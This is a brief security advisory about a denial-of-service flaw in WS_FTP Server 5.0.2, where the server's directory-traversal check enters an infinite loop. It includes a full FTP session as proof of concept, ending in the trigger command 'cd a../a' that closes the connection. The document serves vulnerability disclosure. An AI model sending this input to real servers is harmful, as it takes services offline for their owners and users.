‘WS_FTP Server’s Directory Traversal Protection Mechanism causing DoS’
‘A denial of service vulnerability has been found in WS_FTP Server.
‘The information has been provided by lion.
The original article can be found at: http://www.cnhonker.com/index.php?module=releases&act=view&type=2&id=65‘
* WS_FTP Server version 5.0.2
Due to an issue in WS_FTP Server’s internal protection against directory traversal attacks, a remote attacker can cause WS_FTP to enter an infinite loop by sending it an especially formatted path change request.
Connected to ibm.
220-ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
220-Fri Aug 27 14:12:19 2004
220-29 days remaining on evaluation.
220 ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
User (ibm:(none)): ftp
331 Password required
230 user logged in
ftp> cd a../a
Connection closed by remote host.‘